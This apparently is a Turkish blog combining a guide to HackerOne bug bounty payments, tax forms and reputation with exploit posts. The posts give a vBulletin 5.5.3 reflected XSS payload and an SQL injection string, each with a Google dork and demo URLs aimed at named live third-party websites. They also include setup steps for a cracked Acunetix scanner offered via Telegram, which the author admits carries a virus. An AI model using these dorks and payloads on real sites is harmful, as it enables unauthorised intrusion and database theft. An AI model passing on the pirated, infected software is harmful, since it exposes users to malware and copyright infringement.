HackerOne Bug Bounty

Selamun Aleyküm ..

Uzun zamandir bug bounty hakkinda sorular alıyorum nedir nasil oluyor vs vs ..

Bug Bounty kelime anlamini bilmeyen yoktur ki varsada araştirsin bi zahmet. Olay yerimiz hackerone.com, arkadaslar bu web sitesine herkez üyelik açabilir ücretsiz bir sekilde  AMAA banka hesab bilgilerini ve vergi formunu DOGRU bir sekilde doldurmaniz gerekmektedir.
Uyelik islemi tamamlandiktan sonra yapilacak ilk işlem banka hesabinizi eklemek ve vergi formunu doldurmak

benim önerim dolar hesabi kullanmaniz. neden? derseniz dolar olarak ödeme alıyorsunuz dolar hesabiniz olunca ödeme havale islemleri çabuk gerçekleşiyor ve kazandiginiz paradan 7 dolar kesiliyor, TL hesabinda bu süre 10 güne kadar çikabiliyor ve TL Hesabinda daha fazla kesinti oluyor.. Bu yüzden bir tane dolar hesabi açip https://hackerone.com/settings/payment_preferences kismindan hesab bilgilerinizi ekliyorsunuz.

HackerOne.com Ödeme yöntemleri

Bilgisayar korsanlarına her gün ödül verildiğinden, HackerOne her gün ödeme işlemini başlatır. Seçtiğiniz 3 ödeme yönteminden hangisine bağlı olarak, ödemeler her gün farklı saatlerde işlenir ve para ödemenizin beklenen geri alım süresi de değişir.

Ödeme yöntemlerini eklemek veya kaldırmak için profilinizin Ayarlar> Ödeme Yöntemleri bölümüne gidin.

HackerOne, para ödülleri için bu 3 ödeme yöntemini sunar:

PayPal UTC'de her gün 11:30 Ödeme süresi 1-2 gündür.
Ödeme başlatılır başlatılmaz, PayPal hesabınızın HackerOne'un göndermeye çalıştığı para miktarını doğru bir şekilde alacak şekilde ayarlanması koşuluyla, ödemenizi anında alacaksınız.

Coinbase üzerinden Bitcoin Her gün saat 11: 00 UTC'de Ödeme süresi 1-2 gündür.
Ödeme işleme koyulduktan hemen sonra ödemenizi anında alacaksınız.


Banka Havalesi (Currencycloud) Her hafta içi 09:00 UTC'de Ödeme süresi 1-10 gündür.

Normal (yerel) veya Öncelikli (SWIFT) ödemeleri kullanarak seçebilirsiniz. Ödemenizi ne kadar hızlı alacağınız, bankanızın yanı sıra kullandığınız ödeme türüne de bağlıdır. Bilgisayar korsanlarının aynı gün içinde ödeme aldığı durumlar ve bilgisayar korsanlarının 10 iş gününü beklemek zorunda kaldıkları durumlar var. Banka havaleleri kendi yerel para biriminizde yapılabilir. Ödülleri yerel para biriminize dönüştürmek için, orta piyasa oranı para dönüştürmek için kullanılır. Bu, parayı yerel para biriminize dönüştürmek için bankanıza güvenmenize kıyasla% 5'e varan oranda tasarruf sağlar.

Bankanızın yaptırımlar listesinde olmadığından emin olun. Https://sanctionssearch.ofac.treas.gov/ adresine gidin.Bankanızın listede olup olmadığını kontrol etmek için Bu listedeki bankalar banka havalelerine hak kazanmamaktadır. Örnekler arasında VTB ve SBERBANK bulunmaktadır.

Aklınızda bulundurun:

Banka havalesi yoluyla ödeme alırken, ödemenin gönderilebilmesi için minimum ödeme türünü karşılaması gerekir:

Hızlı ödeme minimum: 100 $
Yerel ödeme minimum: 50 $
Minimum, söz konusu kullanıcı için bekleyen tüm ödemelerin toplamıdır. Örneğin, bir ödülden 1 Dolar ve diğerinden 49 Dolar ödemeniz durumunda, 2 ödeme, yerel ödeme minimum işlem tutarını karşılamasını sağlayan 50 Dolarlık bir ödemede gruplandırılır.

Bu aşamadan sonra vergi formunu imzalamaniz gerekmektedir Vergi formunu translate edin doldurun 3 hakkiniz olmasi lazım diye hatırlıyorum bu yüzden vergi formuna gerçek ADRES, İSİM, SOYİSİM , bilgilerinizi girin.

LÜTFEN RASTGELE DOLDURMAYİN ÖDEME ALAMAZSİNİZ
Örnek:




Vergi formları 

Her türlü parasal ödülün alınması için vergi formları gerekmektedir.

Vergi formunuzu imzalamak için:
Profilinizin Ayarlar> Ödemelerine gidin .
Yeşil banner Seçin tıklayınız

Açılan vergi beyannamesi penceresindeki alanları doldurun .


Click Kaydet .

Vergi formlarınızı imzalamak için sarı bayraktaki bağlantıyı tıklayabileceğiniz Ödemeler ana sayfasına yönlendirileceksiniz.
Dolduracaginiz alan bu kisim

İlgili vergi formunuzu nasıl dolduracağınıza ilişkin talimatlar için bu bağlantılara başvurabilirsiniz:

W-8BEN: https://www.irs.gov/pub/irs-pdf/iw8ben.pdf
W-8BEN-E: https://www.irs.gov/pub/irs-pdf/iw8bene.pdf
W-9: https://www.irs.gov/pub/irs-pdf/iw9.pdf


HackerOne Reputation => İTİBAR

Hacker'lar HackerOne platformu aracılığıyla güvenlik açığı raporları gönderdiklerinden, itibarları, bulmalarının hemen alakalı ve eyleme geçilmesinin ne kadar muhtemel olduğunu ölçer. İtibar, raporun geçerliliğine bağlı olarak kazanılan veya kaybedilen puanlardır. Ödülün büyüklüğüne ve bildirilen güvenlik açığının kritikliğine bağlı olarak ağırlıklandırılır. İtibar, yalnızca hacker olarak iz kaydınıza dayanır.

Özel böcek ödül programlarına davetiyeler almaya hak kazanma gibi yüksek bir itibar sağlayarak kazanılmış bir takım ayrıcalıklar vardır. Kapak tarafında, itibarınız azalırsa, sistem belirli bir zaman diliminde izin verilen rapor gönderim sayısını kademeli olarak azaltır.

Bu topluluk için, güvenlik ekiplerinin, en iyi raporları gönderen bilgisayar korsanlarına kaliteli bir yanıt vermeye odaklanabilmeleri için yüksek sinyal ortamına sahip olmaları kritik öneme sahiptir.


Rapor Durumunun İtibar Üzerindeki Etkileri
Bir Hacker profili 100 itibarı ile başlar. Raporlar kapalı oldukları duruma göre itibar kazanır veya itibarlarını kaybeder

Ödüllerin İtibar Üzerindeki Etkileri hakkinda daha fazla bilgiye BURADAN ULAŞABİLİRSİNİZ

Signal and Impact => Sinyal ve Etki
Sinyal, en yüksek şiddete sahip olanları vurgularken, tutarlı bir şekilde geçerli raporları olan bilgisayar korsanlarının belirlenmesi için bir yol sunar. HackerOne, platformdaki diğer bilgisayar korsanlarına göre Sinyal ve Etkileri için bir bilgisayar korsanının yüzdelik derecesini gösterir. Hem Sinyali hem de Etkisini anlamak, diğer bilgisayar korsanlarına göre performansınızı anlamanıza yardımcı olacaktır.
Sinyaller Hakkinda Daha Fazla Bilgiye BURADAN ULAŞABİLİRSİNİZ


HackerOne Programlar : 
https://hackerone.com/directory Bu kısımda halka açik programlari görebilirsiniz, ben genel olarak parali programlara bakiyorum takdir sizin parasiz programlarada bakabilirsiniz. Burada dikkat etmeniz gereken nokta parali veya parasiz olmasi değil POLİÇE'de program sahibinin sizden ne istediğidir bu kısmı cok uzun tutmayacagim poliçeyi İYİ OKUYUN ANLAYİN Yeter.

Buradan sonrasi pentest islemi ancak otomatik tarayici kullanmak yasak bunu tespit ettiklerinde ödül alamayabilirsiniz bu yüzden atak yaparken dikkat ediniz. 


Diyelim ki bir tane xss buldunuz yada geçerli bir zafiyet buldunuz, hemen programi açiyorsunuz sag üst kösede bulunan YEŞİL Submit Report Butonuna Tıkliyorsunuz.


Güvenlik Açığı Raporu Gönder formunda güvenlik açığının varlık türünü seçin .
yani burada hangi domain üzerinde zafiyet bulduysaniz o domaini seçin.


Zayıflığı veya keşfettiğiniz potansiyel sorunun türünü seçin.


Diger kısımlari boş bırakabilirsiniz onlar istege bagli kısımlar gerek yok zaten rapor onaylaninca personel o kısımları kendi düzeltiyor..

Güvenlik açığı nedir?
Güvenlik açığını yeniden oluşturma adımları.
Bir saldırganın güvenlik açığından yararlanmaları durumunda ne tür bir etkisi olabilir.


(İsteğe bağlı) Ekran görüntüleri, demo videolar veya diğer yardımcı materyalleri ekleyin. Videoları raporda kendilerine bir link ekleyerek paylaşmayın. Videoları doğrudan rapora ekleyebilirsiniz. Bu, güvenlik açığının açığa çıkarılmadan önce başkaları tarafından erişilebilir olmadığından emin olmak içindir.



Rapor Gönder'i tıklayın .
Raporunuzu gönderdikten sonra, programlarınızın gönderiminize yanıt vermesini beklemelisiniz. Rapor ne kadar kaliteli bilgi verici özgün olursa iyi olur.

HER GÖNDERDİĞİNİZ RAPORDAN PARA KAZANAMAZSİNİZ.

Rapor Durumu :



Pre-submission  (Ön başvuru ) :
Bu rapor durumu, yalnızca program için İnsan Artırılmış Sinyali etkinleştirildiğinde uygulanabilir. Rapor, başvuru öncesi durumunda, potansiyel olarak geçersiz olarak işaretlendiğinde başlar. Bir HackerOne güvenlik analisti, önce programa gönderilmeden önce raporu gözden geçirir.

New  (Yeni) : Rapor okunmamış durumda.

Triaged  (triaj) : Rapor değerlendirildi, ancak çözülmedi. Sabit olma durumunda.

Needs More Info (Daha Fazla Bilgi Gerekiyor ) : Bilgisayar korsanından güvenlik açığı hakkında daha fazla bilgi gerekir. 30 günden fazla bir süre için Daha Fazla Bilgi Gerekiyor durumunda olan raporlar otomatik olarak kapanacak ve bilgisayar korsanının ünü üzerinde olumsuz bir etkisi olmayacaktır.

Raporlar hakkinda daha fazla bilgiye BURADAN ULAŞABİLİRSİNİZ

https://hackerone.com/trazer


vBulletin Reflected XSS via "Click here"

# Exploit Title: vBulletin Reflected XSS via "Click here"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here"

Payload:

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

(Click here!) click here xss will work

Demo :

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

screenshot:


#################################################################################

> [Reference]
> https://hackerone.com/trazer
> https://www.trazer.org/
> https://www.cyber-warrior.org/194929/
> https://cxsecurity.com/author/TrazeR/1/

Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability



#################################################################################
# Exploit Title: Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability
# Author : TrazeR  & AKINCİLAR
# Google Dork : intext:"Designed by ORGINSTUDIOS.COM" inurl:catid
# Tested on : Windows 7
# Date : 01.07.2019
# Vendor Home: https://orginstudios.com/
# Blog : https://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] GET parameter 'catid' is vulnerable

Demo: http://graphicarts.gr/portal/corp.php?catid=260'+and(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+aes_decrypt(aes_encrypt(%2f**%2fcOnCaT(0x217e21,%2f**%2fdAtAbAsE(),0x217e21),1),1))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)+and+'1'='1&cp=8&cntrid=


Demo 2 :  http://www.exaireton.com/mainsite/products.php?catid=37

Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: catid=-5607) OR 3893=3893-- HOfb

#AKINCILAR ! BU GÜCE SAYGI DUYUN !

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Acunetix 12.019* Linux Cracked

Acunetix 12.019 Dowloand Buradan son sürüm indirin. Kurulumla Crack İle İlgili Sorunlarınızı Telegram Üzerinden @seytan6161 İle İletişim Kurum


Command: chmod +777 patch_aws


Command:  
./acunetix-12.9.0.sh Yazarak İndirdiğiniz Dosyayi Çaliştirip Email Ve Şifre Belirleyin,

Not: Kurulum bitince size makine adres verecek (https://kali:3443/)
burdaki onemli olan link açmadan
tool çalıştırmadan patch yapmak

patch dosyasını bu adresde yetki yoksa yetkilendirip çalıştırıyoruz
bu adres kapalı ise gizli klosörleri açarak bulabilirsiniz

/home/acunetix/.acunetix_trial/v_19xxxxxx/scanner/

Crack : ./patch_aws

sorunsuz şekilde kullaabilirsiniz


Acunetix 12.x Full Cracked

Selamun Aleyküm ... Acunetix 12.x Sürümünü full yapmayi gösterdim, ek olarak 8. resimde bulduğu zafiyetleride gösteriyor. Resimlerde nasıl yapıldığı mevcut . Crack Viruslüdür localde kullanabilirsiniz
Dowloand Telegram: @Seytan6161 Selamımı iletip acunetix full cracki alabilirsiniz :) 










Burp Suite BurpBounty


Selamun Aleyküm ...

Burp Bounty (BApps Store'daki Adi Scan Check Builder), aktif ve pasif tarayicidir. Ben Manuel kurmayı tercih ettim. Sevdigim noktası payload listemizi ekleyebildiğimiz bir Burp Suite eklentisidir. Bu uzantı, Burp Suite Pro'yu gerektirir.

Dowloand: 
BurpBounty
BurpBounty-v2.3.jar

XSS PAYLOAD LİST

Video :